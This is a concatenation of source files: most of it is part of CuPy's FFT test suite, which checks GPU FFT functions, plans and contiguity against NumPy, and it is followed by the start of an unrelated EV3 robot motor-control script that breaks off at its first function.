@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fftn(self, xp, dtype, order, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
if order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.fftn(a, s=self.s, axes=self.axes, norm=self.norm)
if self.axes is not None and not self.axes:
assert out is a
return out
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_orders('CF')
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifftn(self, xp, dtype, order, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
if order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.ifftn(a, s=self.s, axes=self.axes, norm=self.norm)
if self.axes is not None and not self.axes:
assert out is a
return out
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@pytest.mark.usefixtures('skip_forward_backward')
@testing.parameterize(*(
testing.product_dict([
{'shape': (3, 4), 's': None, 'axes': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1)},
{'shape': (3, 4), 's': None, 'axes': (-1, -2)},
{'shape': (3, 4), 's': None, 'axes': (0,)},
{'shape': (3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1)},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3)},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1)},
{'shape': (2, 3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': None},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2)},
{'shape': (0, 5), 's': None, 'axes': None},
{'shape': (2, 0, 5), 's': None, 'axes': None},
{'shape': (0, 0, 5), 's': None, 'axes': None},
],
testing.product({'norm': [None, 'backward', 'ortho', 'forward']})
)
))
@testing.gpu
class TestPlanCtxManagerFftn:
@pytest.fixture(autouse=True)
def skip_buggy(self):
if cupy.cuda.runtime.is_hip:
# TODO(leofang): test newer ROCm versions
if (self.axes == (0, 1) and self.shape == (2, 3, 4)):
pytest.skip("hipFFT's PlanNd for this case "
"is buggy, so Plan1d is generated "
"instead")
@nd_planning_states()
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fftn(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
if xp is cupy:
from cupyx.scipy.fftpack import get_fft_plan
plan = get_fft_plan(a, self.s, self.axes)
with plan:
out = xp.fft.fftn(a, s=self.s, axes=self.axes, norm=self.norm)
else:
out = xp.fft.fftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp is np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifftn(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
if xp is cupy:
from cupyx.scipy.fftpack import get_fft_plan
plan = get_fft_plan(a, self.s, self.axes)
with plan:
out = xp.fft.ifftn(a, s=self.s, axes=self.axes, norm=self.norm)
else:
out = xp.fft.ifftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp is np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_complex_dtypes()
def test_fftn_error_on_wrong_plan(self, dtype, enable_nd):
if 0 in self.shape:
pytest.skip('0 in shape')
# This test ensures the context manager plan is picked up
from cupyx.scipy.fftpack import get_fft_plan
from cupy.fft import fftn
assert config.enable_nd_planning == enable_nd
# can't get a plan, so skip
if self.axes is not None:
if self.s is not None:
if len(self.s) != len(self.axes):
return
elif len(self.shape) != len(self.axes):
return
a = testing.shaped_random(self.shape, cupy, dtype)
bad_in_shape = tuple(2*i for i in self.shape)
if self.s is None:
bad_out_shape = bad_in_shape
else:
bad_out_shape = tuple(2*i for i in self.s)
b = testing.shaped_random(bad_in_shape, cupy, dtype)
plan_wrong = get_fft_plan(b, bad_out_shape, self.axes)
with pytest.raises(ValueError) as ex, plan_wrong:
fftn(a, s=self.s, axes=self.axes, norm=self.norm)
# targeting a particular error
assert 'The cuFFT plan and a.shape do not match' in str(ex.value)
@pytest.mark.usefixtures('skip_forward_backward')
@testing.parameterize(*testing.product({
'n': [None, 5, 10, 15],
'shape': [(10,), ],
'norm': [None, 'backward', 'ortho', 'forward'],
}))
@testing.gpu
class TestPlanCtxManagerFft:
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if xp is cupy:
from cupyx.scipy.fftpack import get_fft_plan
shape = (self.n,) if self.n is not None else None
plan = get_fft_plan(a, shape=shape)
assert isinstance(plan, cupy.cuda.cufft.Plan1d)
with plan:
out = xp.fft.fft(a, n=self.n, norm=self.norm)
else:
out = xp.fft.fft(a, n=self.n, norm=self.norm)
# np.fft.fft always returns np.complex128
if xp is np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if xp is cupy:
from cupyx.scipy.fftpack import get_fft_plan
shape = (self.n,) if self.n is not None else None
plan = get_fft_plan(a, shape=shape)
assert isinstance(plan, cupy.cuda.cufft.Plan1d)
with plan:
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
else:
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
if xp is np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@testing.for_complex_dtypes()
def test_fft_error_on_wrong_plan(self, dtype):
# This test ensures the context manager plan is picked up
from cupyx.scipy.fftpack import get_fft_plan
from cupy.fft import fft
a = testing.shaped_random(self.shape, cupy, dtype)
bad_shape = tuple(5*i for i in self.shape)
b = testing.shaped_random(bad_shape, cupy, dtype)
plan_wrong = get_fft_plan(b)
assert isinstance(plan_wrong, cupy.cuda.cufft.Plan1d)
with pytest.raises(ValueError) as ex, plan_wrong:
fft(a, n=self.n, norm=self.norm)
# targeting a particular error
assert 'Target array size does not match the plan.' in str(ex.value)
# Almost identical to the TestPlanCtxManagerFft class, except that
# 1. multi-GPU cuFFT is used
# 2. the tested parameter combinations are adjusted to meet the requirements
@pytest.mark.usefixtures('skip_forward_backward')
@testing.parameterize(*testing.product({
'n': [None, 64],
'shape': [(64,), (128,)],
'norm': [None, 'backward', 'ortho', 'forward', ''],
}))
@testing.multi_gpu(2)
@pytest.mark.skipif(cupy.cuda.runtime.is_hip,
reason='hipFFT does not support multi-GPU FFT')
class TestMultiGpuPlanCtxManagerFft:
@multi_gpu_config(gpu_configs=[[0, 1], [1, 0]])
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
_skip_multi_gpu_bug(self.shape, self.gpus)
a = testing.shaped_random(self.shape, xp, dtype)
if xp is cupy:
from cupyx.scipy.fftpack import get_fft_plan
shape = (self.n,) if self.n is not None else None
plan = get_fft_plan(a, shape=shape)
assert isinstance(plan, cupy.cuda.cufft.Plan1d)
with plan:
out = xp.fft.fft(a, n=self.n, norm=self.norm)
else:
out = xp.fft.fft(a, n=self.n, norm=self.norm)
# np.fft.fft always returns np.complex128
if xp is np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@multi_gpu_config(gpu_configs=[[0, 1], [1, 0]])
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifft(self, xp, dtype):
_skip_multi_gpu_bug(self.shape, self.gpus)
a = testing.shaped_random(self.shape, xp, dtype)
if xp is cupy:
from cupyx.scipy.fftpack import get_fft_plan
shape = (self.n,) if self.n is not None else None
plan = get_fft_plan(a, shape=shape)
assert isinstance(plan, cupy.cuda.cufft.Plan1d)
with plan:
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
else:
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
if xp is np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@multi_gpu_config(gpu_configs=[[0, 1], [1, 0]])
@testing.for_complex_dtypes()
def test_fft_error_on_wrong_plan(self, dtype):
# This test ensures the context manager plan is picked up
from cupyx.scipy.fftpack import get_fft_plan
from cupy.fft import fft
a = testing.shaped_random(self.shape, cupy, dtype)
bad_shape = tuple(4*i for i in self.shape)
b = testing.shaped_random(bad_shape, cupy, dtype)
plan_wrong = get_fft_plan(b)
assert isinstance(plan_wrong, cupy.cuda.cufft.Plan1d)
with pytest.raises(ValueError) as ex, plan_wrong:
fft(a, n=self.n, norm=self.norm)
# targeting a particular error
if self.norm == '':
# if norm is invalid, we still get ValueError, but it's raised
# when checking norm, earlier than the plan check
return # skip
assert 'Target array size does not match the plan.' in str(ex.value)
@pytest.mark.usefixtures('skip_forward_backward')
@testing.parameterize(*(
testing.product_dict([
{'shape': (3, 4), 's': None, 'axes': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1)},
{'shape': (3, 4), 's': None, 'axes': (-1, -2)},
{'shape': (3, 4), 's': None, 'axes': (0,)},
{'shape': (3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1)},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3)},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1)},
{'shape': (2, 3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4, 5), 's': None, 'axes': (-3, -2, -1)},
],
testing.product({'norm': [None, 'backward', 'ortho', 'forward', '']})
)
))
@testing.gpu
class TestFftnContiguity:
@nd_planning_states([True])
@testing.for_all_dtypes()
def test_fftn_orders(self, dtype, enable_nd):
for order in ['C', 'F']:
a = testing.shaped_random(self.shape, cupy, dtype)
if order == 'F':
a = cupy.asfortranarray(a)
out = cupy.fft.fftn(a, s=self.s, axes=self.axes)
fft_func = _default_fft_func(a, s=self.s, axes=self.axes)
if fft_func is _fftn:
# nd plans have output with contiguity matching the input
assert out.flags.c_contiguous == a.flags.c_contiguous
assert out.flags.f_contiguous == a.flags.f_contiguous
else:
# 1d planning case doesn't guarantee preserved contiguity
pass
@nd_planning_states([True])
@testing.for_all_dtypes()
def test_ifftn_orders(self, dtype, enable_nd):
for order in ['C', 'F']:
a = testing.shaped_random(self.shape, cupy, dtype)
if order == 'F':
a = cupy.asfortranarray(a)
out = cupy.fft.ifftn(a, s=self.s, axes=self.axes)
fft_func = _default_fft_func(a, s=self.s, axes=self.axes)
if fft_func is _fftn:
# nd plans have output with contiguity matching the input
assert out.flags.c_contiguous == a.flags.c_contiguous
assert out.flags.f_contiguous == a.flags.f_contiguous
else:
# 1d planning case doesn't guarantee preserved contiguity
pass
@pytest.mark.usefixtures('skip_forward_backward')
@testing.parameterize(*testing.product({
'n': [None, 5, 10, 15],
'shape': [(10,), (10, 10)],
'norm': [None, 'backward', 'ortho', 'forward', ''],
}))
@testing.gpu
class TestRfft:
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_rfft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.rfft(a, n=self.n, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_irfft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.irfft(a, n=self.n, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
@pytest.mark.usefixtures('skip_forward_backward')
@testing.parameterize(*testing.product({
'n': [None, 5, 10, 15],
'shape': [(10,)],
'norm': [None, 'backward', 'ortho', 'forward'],
}))
@testing.gpu
class TestPlanCtxManagerRfft:
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_rfft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if xp is cupy:
from cupyx.scipy.fftpack import get_fft_plan
shape = (self.n,) if self.n is not None else None
plan = get_fft_plan(a, shape=shape, value_type='R2C')
assert isinstance(plan, cupy.cuda.cufft.Plan1d)
with plan:
out = xp.fft.rfft(a, n=self.n, norm=self.norm)
else:
out = xp.fft.rfft(a, n=self.n, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_irfft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if xp is cupy:
from cupyx.scipy.fftpack import get_fft_plan
shape = (self.n,) if self.n is not None else None
plan = get_fft_plan(a, shape=shape, value_type='C2R')
assert isinstance(plan, cupy.cuda.cufft.Plan1d)
with plan:
out = xp.fft.irfft(a, n=self.n, norm=self.norm)
else:
out = xp.fft.irfft(a, n=self.n, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
@testing.for_all_dtypes(no_complex=True)
def test_rfft_error_on_wrong_plan(self, dtype):
# This test ensures the context manager plan is picked up
from cupyx.scipy.fftpack import get_fft_plan
from cupy.fft import rfft
a = testing.shaped_random(self.shape, cupy, dtype)
bad_shape = tuple(5*i for i in self.shape)
b = testing.shaped_random(bad_shape, cupy, dtype)
plan_wrong = get_fft_plan(b, value_type='R2C')
assert isinstance(plan_wrong, cupy.cuda.cufft.Plan1d)
with pytest.raises(ValueError) as ex, plan_wrong:
rfft(a, n=self.n, norm=self.norm)
# targeting a particular error
assert 'Target array size does not match the plan.' in str(ex.value)
@pytest.mark.usefixtures('skip_forward_backward')
@testing.parameterize(*(
testing.product_dict([
{'shape': (3, 4), 's': None, 'axes': None},
{'shape': (3, 4), 's': (1, None), 'axes': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1)},
{'shape': (3, 4), 's': None, 'axes': (-1, -2)},
{'shape': (3, 4), 's': None, 'axes': (0,)},
{'shape': (3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1)},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3)},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1)},
{'shape': (2, 3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2)},
{'shape': (2, 3, 4, 5), 's': None, 'axes': None},
],
testing.product({'norm': [None, 'backward', 'ortho', 'forward', '']})
)
))
@testing.gpu
class TestRfft2:
@nd_planning_states()
@testing.for_orders('CF')
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_rfft2(self, xp, dtype, order, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
if order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.rfft2(a, s=self.s, axes=self.axes, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_orders('CF')
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_irfft2(self, xp, dtype, order, enable_nd):
assert config.enable_nd_planning == enable_nd
if (10020 >= cupy.cuda.runtime.runtimeGetVersion() >= 10010
and int(cupy.cuda.device.get_compute_capability()) < 70
and _size_last_transform_axis(
self.shape, self.s, self.axes) == 2):
pytest.skip('work-around for cuFFT issue')
a = testing.shaped_random(self.shape, xp, dtype)
if order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.irfft2(a, s=self.s, axes=self.axes, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': (), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (), 'norm': None},
)
@testing.gpu
class TestRfft2EmptyAxes:
@testing.for_all_dtypes(no_complex=True)
def test_rfft2(self, dtype):
for xp in (np, cupy):
a = testing.shaped_random(self.shape, xp, dtype)
with pytest.raises(IndexError):
xp.fft.rfft2(a, s=self.s, axes=self.axes, norm=self.norm)
@testing.for_all_dtypes()
def test_irfft2(self, dtype):
for xp in (np, cupy):
a = testing.shaped_random(self.shape, xp, dtype)
with pytest.raises(IndexError):
xp.fft.irfft2(a, s=self.s, axes=self.axes, norm=self.norm)
@pytest.mark.usefixtures('skip_forward_backward')
@testing.parameterize(*(
testing.product_dict([
{'shape': (3, 4), 's': None, 'axes': None},
{'shape': (3, 4), 's': (1, None), 'axes': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1)},
{'shape': (3, 4), 's': None, 'axes': (-1, -2)},
{'shape': (3, 4), 's': None, 'axes': (0,)},
{'shape': (3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1)},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3)},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1)},
{'shape': (2, 3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2)},
{'shape': (2, 3, 4, 5), 's': None, 'axes': None},
],
testing.product({'norm': [None, 'backward', 'ortho', 'forward', '']})
)
))
@testing.gpu
class TestRfftn:
@nd_planning_states()
@testing.for_orders('CF')
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_rfftn(self, xp, dtype, order, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
if order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.rfftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_orders('CF')
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_irfftn(self, xp, dtype, order, enable_nd):
assert config.enable_nd_planning == enable_nd
if (10020 >= cupy.cuda.runtime.runtimeGetVersion() >= 10010
and int(cupy.cuda.device.get_compute_capability()) < 70
and _size_last_transform_axis(
self.shape, self.s, self.axes) == 2):
pytest.skip('work-around for cuFFT issue')
a = testing.shaped_random(self.shape, xp, dtype)
if order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.irfftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
# Only those tests in which a legit plan can be obtained are kept
@pytest.mark.usefixtures('skip_forward_backward')
@testing.parameterize(*(
testing.product_dict([
{'shape': (3, 4), 's': None, 'axes': None},
{'shape': (3, 4), 's': (1, None), 'axes': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1)},
{'shape': (3, 4), 's': None, 'axes': (0,)},
{'shape': (3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1)},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1)},
{'shape': (2, 3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2)},
],
testing.product({'norm': [None, 'backward', 'ortho', 'forward', '']})
)
))
@testing.gpu
class TestPlanCtxManagerRfftn:
@pytest.fixture(autouse=True)
def skip_buggy(self):
if cupy.cuda.runtime.is_hip:
# TODO(leofang): test newer ROCm versions
if (self.axes == (0, 1) and self.shape == (2, 3, 4)):
pytest.skip("hipFFT's PlanNd for this case "
"is buggy, so Plan1d is generated "
"instead")
@nd_planning_states()
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_rfftn(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
if xp is cupy:
from cupyx.scipy.fftpack import get_fft_plan
plan = get_fft_plan(a, self.s, self.axes, value_type='R2C')
with plan:
out = xp.fft.rfftn(a, s=self.s, axes=self.axes, norm=self.norm)
else:
out = xp.fft.rfftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@pytest.mark.skipif(cupy.cuda.runtime.is_hip,
reason="hipFFT's PlanNd for C2R is buggy")
@nd_planning_states()
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_irfftn(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
if xp is cupy:
from cupyx.scipy.fftpack import get_fft_plan
plan = get_fft_plan(a, self.s, self.axes, value_type='C2R')
with plan:
out = xp.fft.irfftn(
a, s=self.s, axes=self.axes, norm=self.norm)
else:
out = xp.fft.irfftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
# TODO(leofang): write test_rfftn_error_on_wrong_plan()?
@pytest.mark.usefixtures('skip_forward_backward')
@testing.parameterize(*(
testing.product_dict([
{'shape': (3, 4), 's': None, 'axes': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1)},
{'shape': (3, 4), 's': None, 'axes': (-1, -2)},
{'shape': (3, 4), 's': None, 'axes': (0,)},
{'shape': (3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1)},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3)},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1)},
{'shape': (2, 3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4, 5), 's': None, 'axes': None},
],
testing.product({'norm': [None, 'backward', 'ortho', 'forward', '']})
)
))
@testing.gpu
class TestRfftnContiguity:
@nd_planning_states([True])
@testing.for_float_dtypes()
def test_rfftn_orders(self, dtype, enable_nd):
for order in ['C', 'F']:
a = testing.shaped_random(self.shape, cupy, dtype)
if order == 'F':
a = cupy.asfortranarray(a)
out = cupy.fft.rfftn(a, s=self.s, axes=self.axes)
fft_func = _default_fft_func(a, s=self.s, axes=self.axes,
value_type='R2C')
if fft_func is _fftn:
# nd plans have output with contiguity matching the input
assert out.flags.c_contiguous == a.flags.c_contiguous
assert out.flags.f_contiguous == a.flags.f_contiguous
else:
# 1d planning case doesn't guarantee preserved contiguity
pass
@nd_planning_states([True])
@testing.for_all_dtypes()
def test_ifftn_orders(self, dtype, enable_nd):
for order in ['C', 'F']:
a = testing.shaped_random(self.shape, cupy, dtype)
if order == 'F':
a = cupy.asfortranarray(a)
out = cupy.fft.irfftn(a, s=self.s, axes=self.axes)
fft_func = _default_fft_func(a, s=self.s, axes=self.axes,
value_type='C2R')
if fft_func is _fftn:
# nd plans have output with contiguity matching the input
assert out.flags.c_contiguous == a.flags.c_contiguous
assert out.flags.f_contiguous == a.flags.f_contiguous
else:
# 1d planning case doesn't guarantee preserved contiguity
pass
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': (), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (), 'norm': None},
)
@testing.gpu
class TestRfftnEmptyAxes:
@testing.for_all_dtypes(no_complex=True)
def test_rfftn(self, dtype):
for xp in (np, cupy):
a = testing.shaped_random(self.shape, xp, dtype)
with pytest.raises(IndexError):
xp.fft.rfftn(a, s=self.s, axes=self.axes, norm=self.norm)
@testing.for_all_dtypes()
def test_irfftn(self, dtype):
for xp in (np, cupy):
a = testing.shaped_random(self.shape, xp, dtype)
with pytest.raises(IndexError):
xp.fft.irfftn(a, s=self.s, axes=self.axes, norm=self.norm)
@pytest.mark.usefixtures('skip_forward_backward')
@testing.parameterize(*testing.product({
'n': [None, 5, 10, 15],
'shape': [(10,), (10, 10)],
'norm': [None, 'backward', 'ortho', 'forward', ''],
}))
@testing.gpu
class TestHfft:
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_hfft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.hfft(a, n=self.n, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ihfft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ihfft(a, n=self.n, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.parameterize(
{'n': 1, 'd': 1},
{'n': 10, 'd': 0.5},
{'n': 100, 'd': 2},
)
@testing.gpu
class TestFftfreq:
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_fftfreq(self, xp, dtype):
out = xp.fft.fftfreq(self.n, self.d)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_rfftfreq(self, xp, dtype):
out = xp.fft.rfftfreq(self.n, self.d)
return out
@testing.parameterize(
{'shape': (5,), 'axes': None},
{'shape': (5,), 'axes': 0},
{'shape': (10,), 'axes': None},
{'shape': (10,), 'axes': 0},
{'shape': (10, 10), 'axes': None},
{'shape': (10, 10), 'axes': 0},
{'shape': (10, 10), 'axes': (0, 1)},
)
@testing.gpu
class TestFftshift:
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_fftshift(self, xp, dtype):
x = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.fftshift(x, self.axes)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_ifftshift(self, xp, dtype):
x = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ifftshift(x, self.axes)
return out
class TestThreading:
def test_threading1(self):
import threading
from cupy.cuda.cufft import get_current_plan
def thread_get_curr_plan():
cupy.cuda.Device().use()
return get_current_plan()
new_thread = threading.Thread(target=thread_get_curr_plan)
new_thread.start()
def test_threading2(self):
import threading
a = cupy.arange(100, dtype=cupy.complex64).reshape(10, 10)
def thread_do_fft():
cupy.cuda.Device().use()
b = cupy.fft.fftn(a)
return b
new_thread = threading.Thread(target=thread_do_fft)
new_thread.start()
|
sem_walk.py
|
#!/usr/bin/env python3
from ev3dev2.motor import MediumMotor, OUTPUT_A, OUTPUT_B, OUTPUT_C, OUTPUT_D, SpeedPercent, MoveSteering
from ev3dev2.sound import Sound
from ev3dev2.sensor import INPUT_1, INPUT_2, INPUT_3, INPUT_4
from ev3dev2.sensor.lego import InfraredSensor, ColorSensor, TouchSensor
from time import sleep
import time, logging, threading
#---------- Documentation -------------#
# INPUT_1 - InfraredSensor
# INPUT_2 - TouchSensor
# INPUT_3
# INPUT_4 - ColorSensor
# OUTPUT_A
# OUTPUT_B - MoveTank (left motor)
# OUTPUT_C - MoveTank (right motor)
# OUTPUT_D - MediumMotor (shooter motor)
#-------------------------------------- ACTIONS ---------------------------------------#
sleep_time = 0.3
DEFAULT_SLEEP_TIMEOUT_IN_SEC = 0.05
CANAL = 3
def oneShooter():
